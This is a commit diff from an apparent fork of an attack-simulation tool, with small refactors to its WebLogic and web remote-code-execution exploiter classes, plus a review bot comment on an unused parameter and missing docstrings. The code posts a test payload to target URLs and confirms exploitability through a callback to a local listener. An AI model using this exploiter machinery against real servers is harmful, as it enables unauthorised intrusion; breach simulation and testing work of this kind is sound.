forked from p15670423/monkey
Syntactic, small changes to weblogic and web_rce
parent
6073e9f677
commit
7ab22bb3e9
|
@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
|
||||||
exploit_config['upload_commands'] = None
|
exploit_config['upload_commands'] = None
|
||||||
|
|
||||||
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
|
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
|
||||||
exploit_config['url_extensions'] = None
|
exploit_config['url_extensions'] = []
|
||||||
|
|
||||||
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
|
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
|
||||||
exploit_config['stop_checking_urls'] = False
|
exploit_config['stop_checking_urls'] = False
|
||||||
|
|
|
@ -69,7 +69,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
print(e)
|
print(e)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def add_vulnerable_urls(self, urls):
|
def add_vulnerable_urls(self, urls, stop_checking=False):
|
||||||
"""
|
"""
|
||||||
Overrides parent method to use listener server
|
Overrides parent method to use listener server
|
||||||
"""
|
"""
|
||||||
|
@ -78,7 +78,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
exploitable = False
|
exploitable = False
|
||||||
|
|
||||||
for url in urls:
|
for url in urls:
|
||||||
if self.check_if_exploitable(url, httpd):
|
if self.check_if_exploitable_weblogic(url, httpd):
|
||||||
exploitable = True
|
exploitable = True
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -95,8 +95,8 @@ class WebLogicExploiter(WebRCE):
|
||||||
|
|
||||||
self._stop_http_server(httpd, lock)
|
self._stop_http_server(httpd, lock)
|
||||||
|
|
||||||
def check_if_exploitable(self, url, httpd):
|
def check_if_exploitable_weblogic(self, url, httpd):
|
||||||
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
|
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
|
||||||
try:
|
try:
|
||||||
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
|
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
|
||||||
except exceptions.ReadTimeout:
|
except exceptions.ReadTimeout:
|
||||||
|
@ -120,7 +120,8 @@ class WebLogicExploiter(WebRCE):
|
||||||
lock.acquire()
|
lock.acquire()
|
||||||
return httpd, lock
|
return httpd, lock
|
||||||
|
|
||||||
def _stop_http_server(self, httpd, lock):
|
@staticmethod
|
||||||
|
def _stop_http_server(httpd, lock):
|
||||||
lock.release()
|
lock.release()
|
||||||
httpd.join(SERVER_TIMEOUT)
|
httpd.join(SERVER_TIMEOUT)
|
||||||
httpd.stop()
|
httpd.stop()
|
||||||
|
@ -194,8 +195,8 @@ class WebLogicExploiter(WebRCE):
|
||||||
we determine if we can exploit by either getting a GET request from host or not.
|
we determine if we can exploit by either getting a GET request from host or not.
|
||||||
"""
|
"""
|
||||||
def __init__(self, local_ip, local_port, lock, max_requests=1):
|
def __init__(self, local_ip, local_port, lock, max_requests=1):
|
||||||
self._local_ip = local_ip
|
self.local_ip = local_ip
|
||||||
self._local_port = local_port
|
self.local_port = local_port
|
||||||
self.get_requests = 0
|
self.get_requests = 0
|
||||||
self.max_requests = max_requests
|
self.max_requests = max_requests
|
||||||
self._stopped = False
|
self._stopped = False
|
||||||
|
@ -210,7 +211,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
LOG.info('Server received a request from vulnerable machine')
|
LOG.info('Server received a request from vulnerable machine')
|
||||||
self.get_requests += 1
|
self.get_requests += 1
|
||||||
LOG.info('Server waiting for exploited machine request...')
|
LOG.info('Server waiting for exploited machine request...')
|
||||||
httpd = HTTPServer((self._local_ip, self._local_port), S)
|
httpd = HTTPServer((self.local_ip, self.local_port), S)
|
||||||
httpd.daemon = True
|
httpd.daemon = True
|
||||||
self.lock.release()
|
self.lock.release()
|
||||||
while not self._stopped and self.get_requests < self.max_requests:
|
while not self._stopped and self.get_requests < self.max_requests:
|
||||||
|
|
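Review bot: The `stop_checking=False` parameter added to `WebLogicExploiter.add_vulnerable_urls` does not appear to be read in the visible body: the loop over `urls` breaks on the first URL for which `check_if_exploitable_weblogic` returns true, whatever the caller passes. If the parameter exists only to keep the override's signature in line with `WebRCE`, the docstring should say so, for example `stop_checking: accepted for signature compatibility and ignored; this override always stops at the first URL that calls back to the listener`. The renamed `check_if_exploitable_weblogic` has no docstring either; one line saying that it posts the test payload built from `httpd.local_ip`/`httpd.local_port` and, presumably, reports whether the listener saw the resulting GET would make the callback-based check clear to the next reader. Both method bodies continue outside the hunks shown, so confirm the parameter really is unused before documenting it as ignored.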